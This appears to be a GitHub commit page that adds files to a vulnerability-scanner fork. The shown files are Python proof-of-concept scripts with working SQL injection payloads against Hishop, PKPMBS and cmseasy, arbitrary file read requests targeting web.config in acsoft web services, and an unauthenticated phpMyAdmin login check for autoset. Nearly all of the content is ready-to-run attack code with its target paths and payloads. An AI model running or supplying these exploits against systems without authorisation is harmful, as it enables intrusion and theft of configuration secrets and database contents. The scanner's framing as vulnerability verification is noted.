forked from Cl0udG0d/SZhe_Scan
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
806 changed files
with
15,136 additions
and
0 deletions.
There are no files selected for viewing
Empty file.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,35 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| ''' | ||
| name: Hishop系统productlist.aspx SQL注入 | ||
| referer: http://www.wooyun.org/bugs/wooyun-2015-0154499 | ||
| author: Lucifer | ||
| description: Hishop易分销系统/wapshop/productlist.aspx文件中参数sort存在注入 | ||
| ''' | ||
| import sys | ||
| import requests | ||
| import warnings | ||
| from termcolor import cprint | ||
|
|
||
| class hishop_productlist_sqli_BaseVerify: | ||
| def __init__(self, url): | ||
| self.url = url | ||
|
|
||
| def run(self): | ||
| payload = "/wapshop/productlist.aspx?sort=char(sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27)))" | ||
| vulnurl = self.url + payload | ||
| try: | ||
| req = requests.get(vulnurl, timeout=10, verify=False) | ||
|
|
||
| if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: | ||
| cprint("[+]存在Hishop SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red") | ||
| else: | ||
| cprint("[-]不存在hishop_productlist_sqli漏洞", "white", "on_grey") | ||
|
|
||
| except: | ||
| cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") | ||
|
|
||
| if __name__ == "__main__": | ||
| warnings.filterwarnings("ignore") | ||
| testVuln = hishop_productlist_sqli_BaseVerify(sys.argv[1]) | ||
| testVuln.run() |
Empty file.
Binary file not shown.
Binary file not shown.
Binary file added
BIN
+1.88 KB
POCScan/cms/PKPMBS/__pycache__/pkpmbs_addresslist_keyword_sqli.cpython-37.pyc
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,42 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| ''' | ||
| name: pkpmbs建设工程质量监督系统SQL注入 | ||
| referer: http://www.wooyun.org/bugs/wooyun-2010-0120366 | ||
| author: Lucifer | ||
| description: 文件/PKPMBS/portal/MsgList.aspx postSQL注入。 | ||
| ''' | ||
| import sys | ||
| import json | ||
| import requests | ||
| import warnings | ||
| from termcolor import cprint | ||
|
|
||
| class pkpmbs_MsgList_sqli_BaseVerify: | ||
| def __init__(self, url): | ||
| self.url = url | ||
|
|
||
| def run(self): | ||
| headers = { | ||
| "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
| } | ||
| payload = "/PKPMBS/portal/MsgList.aspx" | ||
| post_data = { | ||
| "keyword":"1' AnD 1=CoNvErT(InT,(ChAr(71)+ChAr(65)+ChAr(79)+ChAr(74)+ChAr(73)+@@VeRsIoN)) AnD '%'='", | ||
| "Submit3":"搜 索" | ||
| } | ||
| vulnurl = self.url + payload | ||
| try: | ||
| req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) | ||
| if r"GAOJIMicrosoft" in req.text: | ||
| cprint("[+]存在pkpmbs建设工程质量监督系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red") | ||
| else: | ||
| cprint("[-]不存在pkpmbs_MsgList_sqli漏洞", "white", "on_grey") | ||
|
|
||
| except: | ||
| cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") | ||
|
|
||
| if __name__ == "__main__": | ||
| warnings.filterwarnings("ignore") | ||
| testVuln = pkpmbs_MsgList_sqli_BaseVerify(sys.argv[1]) | ||
| testVuln.run() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,42 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| ''' | ||
| name: pkpmbs建设工程质量监督系统注入 | ||
| referer: http://www.wooyun.org/bugs/wooyun-2010-0120366 | ||
| author: Lucifer | ||
| description: userService/addresslist.aspx文件中POST keyword存在SQL注入。 | ||
| ''' | ||
| import sys | ||
| import json | ||
| import requests | ||
| import warnings | ||
| from termcolor import cprint | ||
|
|
||
| class pkpmbs_addresslist_keyword_sqli_BaseVerify: | ||
| def __init__(self, url): | ||
| self.url = url | ||
|
|
||
| def run(self): | ||
| headers = { | ||
| "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
| } | ||
| payload = "/userService/addresslist.aspx" | ||
| post_data = { | ||
| "keyword":"1'AnD 1=CoNvErt(InT,(ChAr(71)+ChAr(65)+ChAr(79)+ChAr(74)+ChAr(73)+@@VeRsIon)) AnD'%'='", | ||
| "Submit3":"%E6%90%9C%E3%80%80%E7%B4%A2" | ||
| } | ||
| vulnurl = self.url + payload | ||
| try: | ||
| req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) | ||
| if r"GAOJIMicrosoft" in req.text: | ||
| cprint("[+]存在pkpmbs建设工程质量监督系统注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red") | ||
| else: | ||
| cprint("[-]不存在pkpmbs_addresslist_keyword_sqli漏洞", "white", "on_grey") | ||
|
|
||
| except: | ||
| cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") | ||
|
|
||
| if __name__ == "__main__": | ||
| warnings.filterwarnings("ignore") | ||
| testVuln = pkpmbs_addresslist_keyword_sqli_BaseVerify(sys.argv[1]) | ||
| testVuln.run() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,35 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| ''' | ||
| name: PKPMBS工程质量监督站信息管理系统SQL注入 | ||
| referer: http://www.wooyun.org/bugs/wooyun-2015-0154499 | ||
| author: Lucifer | ||
| description: PKPMBS guestbook.aspx文件中参数id存在SQL注入漏洞 | ||
| ''' | ||
| import sys | ||
| import requests | ||
| import warnings | ||
| from termcolor import cprint | ||
|
|
||
| class pkpmbs_guestbook_sqli_BaseVerify: | ||
| def __init__(self, url): | ||
| self.url = url | ||
|
|
||
| def run(self): | ||
| payload = "/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--" | ||
| vulnurl = self.url + payload | ||
| try: | ||
| req = requests.get(vulnurl, timeout=10, verify=False) | ||
|
|
||
| if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: | ||
| cprint("[+]存在PKPMBS SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red") | ||
| else: | ||
| cprint("[-]不存在pkpmbs_guestbook_sqli漏洞", "white", "on_grey") | ||
|
|
||
| except: | ||
| cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") | ||
|
|
||
| if __name__ == "__main__": | ||
| warnings.filterwarnings("ignore") | ||
| testVuln = pkpmbs_guestbook_sqli_BaseVerify(sys.argv[1]) | ||
| testVuln.run() |
Empty file.
Binary file not shown.
Binary file not shown.
Empty file.
Binary file not shown.
Binary file added
BIN
+1.82 KB
POCScan/cms/acsoft/__pycache__/acsoft_GetFileContent_fileread.cpython-37.pyc
Binary file not shown.
Binary file added
BIN
+1.76 KB
POCScan/cms/acsoft/__pycache__/acsoft_GetFile_fileread.cpython-37.pyc
Binary file not shown.
Binary file added
BIN
+1.79 KB
POCScan/cms/acsoft/__pycache__/acsoft_GetXMLList_fileread.cpython-37.pyc
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,42 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| ''' | ||
| name: 安财软件GetFileContent任意文件读取 | ||
| referer: http://www.wooyun.org/bugs/wooyun-2015-0121651 | ||
| author: Lucifer | ||
| description: 文件/WS/WebService.asmx/GetFileContent中,参数fileName存在任意文件读取。 | ||
| ''' | ||
| import sys | ||
| import json | ||
| import requests | ||
| import warnings | ||
| from termcolor import cprint | ||
|
|
||
| class acsoft_GetFileContent_fileread_BaseVerify: | ||
| def __init__(self, url): | ||
| self.url = url | ||
|
|
||
| def run(self): | ||
| headers = { | ||
| "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
| } | ||
| post_data = { | ||
| "Content":"1", | ||
| "fileName":"web.config" | ||
| } | ||
| payload = "/WS/WebService.asmx/GetFileContent" | ||
| vulnurl = self.url + payload | ||
| try: | ||
| req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) | ||
| if req.headers["Content-Type"] == "application/xml": | ||
| cprint("[+]存在安财软件GetFileContent任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red") | ||
| else: | ||
| cprint("[-]不存在acsoft_GetFileContent_fileread漏洞", "white", "on_grey") | ||
|
|
||
| except: | ||
| cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") | ||
|
|
||
| if __name__ == "__main__": | ||
| warnings.filterwarnings("ignore") | ||
| testVuln = acsoft_GetFileContent_fileread_BaseVerify(sys.argv[1]) | ||
| testVuln.run() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,42 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| ''' | ||
| name: 安财软件GetFile任意文件读取 | ||
| referer: http://www.wooyun.org/bugs/wooyun-2015-0121651 | ||
| author: Lucifer | ||
| description: 文件/WS/WebService.asmx/GetFile中,参数FileName存在任意文件读取。 | ||
| ''' | ||
| import sys | ||
| import json | ||
| import requests | ||
| import warnings | ||
| from termcolor import cprint | ||
|
|
||
| class acsoft_GetFile_fileread_BaseVerify: | ||
| def __init__(self, url): | ||
| self.url = url | ||
|
|
||
| def run(self): | ||
| headers = { | ||
| "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
| } | ||
| post_data = { | ||
| "VirtualPath":"", | ||
| "FileName":"web.config" | ||
| } | ||
| payload = "/WS/WebService.asmx/GetFile" | ||
| vulnurl = self.url + payload | ||
| try: | ||
| req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) | ||
| if req.headers["Content-Type"] == "application/xml": | ||
| cprint("[+]存在安财软件GetFile任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red") | ||
| else: | ||
| cprint("[-]不存在acsoft_GetFile_fileread漏洞", "white", "on_grey") | ||
|
|
||
| except: | ||
| cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") | ||
|
|
||
| if __name__ == "__main__": | ||
| warnings.filterwarnings("ignore") | ||
| testVuln = acsoft_GetFile_fileread_BaseVerify(sys.argv[1]) | ||
| testVuln.run() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,41 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| ''' | ||
| name: 安财软件GetXMLList任意文件读取 | ||
| referer: http://www.wooyun.org/bugs/wooyun-2015-0121651 | ||
| author: Lucifer | ||
| description: 文件/WS/WebServiceBase.asmx/GetXMLList中,参数strXMLFileName存在任意文件读取。 | ||
| ''' | ||
| import sys | ||
| import json | ||
| import requests | ||
| import warnings | ||
| from termcolor import cprint | ||
|
|
||
| class acsoft_GetXMLList_fileread_BaseVerify: | ||
| def __init__(self, url): | ||
| self.url = url | ||
|
|
||
| def run(self): | ||
| headers = { | ||
| "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
| } | ||
| post_data = { | ||
| "strXMLFileName":"../web.config" | ||
| } | ||
| payload = "/WS/WebServiceBase.asmx/GetXMLList" | ||
| vulnurl = self.url + payload | ||
| try: | ||
| req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) | ||
| if req.headers["Content-Type"] == "application/xml": | ||
| cprint("[+]存在安财软件GetXMLList任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red") | ||
| else: | ||
| cprint("[-]不存在acsoft_GetXMLList_fileread漏洞", "white", "on_grey") | ||
|
|
||
| except: | ||
| cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") | ||
|
|
||
| if __name__ == "__main__": | ||
| warnings.filterwarnings("ignore") | ||
| testVuln = acsoft_GetXMLList_fileread_BaseVerify(sys.argv[1]) | ||
| testVuln.run() |
Empty file.
Binary file not shown.
Binary file added
BIN
+1.84 KB
POCScan/cms/autoset/__pycache__/autoset_phpmyadmin_unauth.cpython-37.pyc
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,44 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| ''' | ||
| name: 韩国autoset建站程序phpmyadmin任意登录漏洞 | ||
| referer: https://www.t00ls.net/viewthread.php?tid=37863&extra=&page=1 | ||
| author: Lucifer | ||
| description: /phpmyadmin任意用户名密码登录,通过低权限提权可获取root密码插入shell。 | ||
| ''' | ||
| import sys | ||
| import json | ||
| import requests | ||
| import warnings | ||
| from termcolor import cprint | ||
|
|
||
| class autoset_phpmyadmin_unauth_BaseVerify: | ||
| def __init__(self, url): | ||
| self.url = url | ||
|
|
||
| def run(self): | ||
| headers = { | ||
| "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
| } | ||
| payload = "/phpmyadmin/index.php" | ||
| vulnurl = self.url + payload | ||
| post_data = { | ||
| "pma_username":"test", | ||
| "pma_password":"123", | ||
| "server":"1", | ||
| "target":"index.php", | ||
| } | ||
| try: | ||
| req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) | ||
| if r"li_server_type" in req.text: | ||
| cprint("[+]存在韩国autoset建站程序phpmyadmin任意登录漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red") | ||
| else: | ||
| cprint("[-]不存在autoset_phpmyadmin_unauth漏洞", "white", "on_grey") | ||
|
|
||
| except: | ||
| cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") | ||
|
|
||
| if __name__ == "__main__": | ||
| warnings.filterwarnings("ignore") | ||
| testVuln = autoset_phpmyadmin_unauth_BaseVerify(sys.argv[1]) | ||
| testVuln.run() |
Empty file.
Binary file not shown.
Binary file added
BIN
+1.92 KB
POCScan/cms/cmseasy/__pycache__/cmseasy_header_detail_sqli.cpython-37.pyc
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,43 @@ | ||
|
|
||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| ''' | ||
| name: cmseasy header.php 报错注入 | ||
| referer: http://www.wooyun.org/bugs/wooyun-2015-0137013 | ||
| author: Lucifer | ||
| description: 文件/coupon/s.php中,参数fids存在SQL注入。 | ||
| ''' | ||
| import sys | ||
| import json | ||
| import requests | ||
| import warnings | ||
| from termcolor import cprint | ||
|
|
||
| class cmseasy_header_detail_sqli_BaseVerify: | ||
| def __init__(self, url): | ||
| self.url = url | ||
|
|
||
| def run(self): | ||
| headers = { | ||
| "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" | ||
| } | ||
| post_data = { | ||
| "xajax":"Postdata", | ||
| "xajaxargs[0]":"<xjxquery><q>detail=xxxxxx'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT (ELT(1=1,md5(1234)))),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)AND'1'='1</q></xjxquery>", | ||
| } | ||
| payload = "/celive/live/header.php" | ||
| vulnurl = self.url + payload | ||
| try: | ||
| req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) | ||
| if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: | ||
| cprint("[+]存在cmseasy header.php 报错注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red") | ||
| else: | ||
| cprint("[-]不存在cmseasy_header_detail_sqli漏洞", "white", "on_grey") | ||
|
|
||
| except: | ||
| cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") | ||
|
|
||
| if __name__ == "__main__": | ||
| warnings.filterwarnings("ignore") | ||
| testVuln = cmseasy_header_detail_sqli_BaseVerify(sys.argv[1]) | ||
| testVuln.run() |
Oops, something went wrong.